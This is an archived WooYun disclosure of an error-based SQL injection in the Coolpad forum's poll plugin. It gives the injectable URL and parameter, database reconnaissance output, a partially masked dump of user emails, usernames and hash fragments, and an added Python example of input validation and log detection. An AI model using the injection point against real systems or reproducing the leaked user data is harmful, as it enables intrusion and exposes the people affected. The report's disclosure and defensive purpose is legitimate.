WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-01-10: Details reported to the vendor, awaiting vendor handling
2015-01-14: Vendor confirmed; details visible to the vendor only
2015-01-24: Details disclosed to core white hats and relevant domain experts
2015-02-03: Details disclosed to regular white hats
2015-02-13: Details disclosed to intern white hats
2015-02-24: Details disclosed to the public
Critical SQL injection in the Coolpad forum can expose more than 60,000 users across the whole network
http://bbs.coolpad.com/poll/
Coolpad uses the Discuz xplus plugin, whose main function is polls. I started constructing URLs and then tried injection. Based on results from my own local installation, the constructed URL is as follows:
http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31
The choiceId parameter is injectable.
Target: http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31
Host IP: 58.220.6.144
Web Server: nginx
DB Server: MySQL
Resp. Time(avg): 378 ms
Current User: [email protected]
Sql Version: 5.6.15-log
Current DB: coolpad_poll
System User: [email protected]
Host Name: coolyun-50-20
Installation dir: /usr/coolpad/Percona-Server-5.6.15-rel63.0
DB User: 'coolpad_poll'@'192.168.0.11'
Data Bases: information_schema coolpad_poll test
Since the xplus user data is linked with the Discuz data, and the Coolpad forum data is linked with the main Coolyun database, this can expose users across the whole network. Because it is error-based injection, dumping the database is effortless.
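An added illustration, not code from the Coolpad forum, Discuz or the xplus plugin (which is PHP): the pattern that closes the hole described above is to accept id and choiceId only as strict integers and to bind them as query parameters, so no user-supplied text ever becomes part of the SQL, and on the operations side to flag requests to poll.php whose id or choiceId is not a plain number, which is what an error-based probe against this endpoint looks like in the access log. The table layout, column names, log format and log lines are constructed assumptions, and the example uses Python with an in-memory SQLite table so it runs offline.

```python
"""Strict integer parameters + bound queries for a poll endpoint, plus an
access-log check. Added illustration; table, columns and log lines are
constructed and are not the Coolpad forum's or the xplus plugin's own."""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit


def build_db():
    """Constructed stand-in for the plugin's vote table (assumed layout)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE poll_voters (uid INTEGER, pollid INTEGER, choiceid INTEGER);
        INSERT INTO poll_voters VALUES (1001, 4, 31), (1002, 4, 31), (1003, 4, 32);
        """
    )
    return conn


def parse_positive_int(raw):
    """Accept only an ASCII decimal string (1..9999999999). Quotes, spaces
    or any trailing fragment raise before a query is built."""
    if not isinstance(raw, str) or not re.fullmatch(r"[1-9][0-9]{0,9}", raw):
        raise ValueError("choiceId must be a positive integer")
    return int(raw)


def is_rejected(raw):
    """True when the validator refuses the raw parameter value."""
    try:
        parse_positive_int(raw)
    except ValueError:
        return True
    return False


def view_voters(conn, poll_id, choice_id):
    """Return voter uids for a poll choice. Both ids are validated and
    bound as parameters, so the SQL text never contains request input."""
    pid = parse_positive_int(poll_id)
    cid = parse_positive_int(choice_id)
    rows = conn.execute(
        "SELECT uid FROM poll_voters WHERE pollid = ? AND choiceid = ?",
        (pid, cid),
    ).fetchall()
    return [r[0] for r in rows]


# Detection side: assumed nginx combined-log format, constructed lines.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2015:10:00:01 +0800] "GET /poll/poll.php?action=viewVoters&id=4&choiceId=31 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Jan/2015:10:00:02 +0800] "GET /poll/poll.php?action=viewVoters&id=4&choiceId=31%27 HTTP/1.1" 500 1024',
    '10.0.0.6 - - [10/Jan/2015:10:00:03 +0800] "GET /forum.php?mod=viewthread&tid=1 HTTP/1.1" 200 2048',
]


def suspicious_requests(log_lines):
    """Flag poll.php requests whose id or choiceId is not a plain integer.
    Returns (parameter, decoded value, HTTP status) tuples; a 500 next to a
    malformed value is the error-based pattern worth alerting on."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if not parts.path.endswith("/poll/poll.php"):
            continue
        qs = parse_qs(parts.query)  # percent-decodes, e.g. %27 -> '
        for key in ("id", "choiceId"):
            for value in qs.get(key, []):
                if not re.fullmatch(r"[0-9]+", value):
                    hits.append((key, value, m.group("status")))
    return hits


if __name__ == "__main__":
    db = build_db()
    print("voters for choice 31:", view_voters(db, "4", "31"))
    print("malformed choiceId rejected:", is_rejected("31'"))
    print("flagged log entries:", suspicious_requests(SAMPLE_LOG))
```

The validator runs before any SQL is assembled, so even a driver without real parameter binding would never see the quote; the bound query is the second, independent layer. The log check is deliberately narrow (one path, two parameters) so it can be dropped into an existing log pipeline without tuning.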
*****d: ui********************=bbs@kefu********************sername********************0f3c10bfb4921******************** uid=1********************=wyd68@vi********************sername********************696018d26c305******************** uid=1********************=fred.sun********************sername********************a9a28672f6c07******************** uid=1********************=winny997********************sername********************3231004414094******************** uid=1********************il=mark7********************sername********************b680c59bbd5ba******************** uid=1********************erwengjuche********************rname=we********************1438934ff84df******************** uid=1********************il=ryyf@******************** usern********************4be28a9c0554c******************** uid=1********************=85890569********************sername********************e4b7d54d825a6******************** uid=1********************mail=fz********************e=\u771f\u********************3d2e2f69585a3******************** uid=1********************=12410240********************sername********************488c6f1f6607f******************** uid=1********************=zhenhao8********************rname=zh********************93f9b7e529dc1******************** uid=1********************il=cnoco********************rname=15********************09ca9871d98e4******************** uid=1********************=xs060025********************rname=an********************a48719b4f3477******************** uid=1********************=53079414********************ame=angel********************adfbc02567388******************** uid=1********************il=seko2********************sername********************1772f8dfb7635******************** uid=1********************il=13256********************rname=to********************767a9ed57c808******************** uid=1********************il=hhboy******************** usern********************d1b695060bc63******************** 
uid=1********************=tsfj_881******************** usern********************055dbf81fc657******************** uid=1********************=li810330********************sername********************c3010d0fb2463******************** uid=1********************il=zztel********************sername********************6adb2154c40f2******************** uid=1********************=51494104********************ame=\u917********************66e4885017a00******************** uid=1********************il=0001s********************sername********************156430e51cb85******************** uid=1********************=27292334********************sername********************1f18c4c2d862c******************** uid=1********************il=czjna********************sername********************f16d5a30cac32******************** uid=1********************il=wxkno********************sername********************e95d45a6ffb92******************** uid=1********************il=zs966********************sername********************8f4647b8e8ac2******************** uid=1********************=13378387********************sername********************246ce51754fc7******************** uid=1********************=lhf51729********************e=\u5389\u********************ebe6d32222eb2******************** uid=1********************il=doxin********************rname=do********************c52a7d7b54e03******************** uid=1**********。</**********^觉停了^**********^多^**********) from coolpad_po********************ult: *****
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-01-14 08:52
Thank you for your attention to Coolpad security; this has been submitted to the business unit for urgent handling.
None yet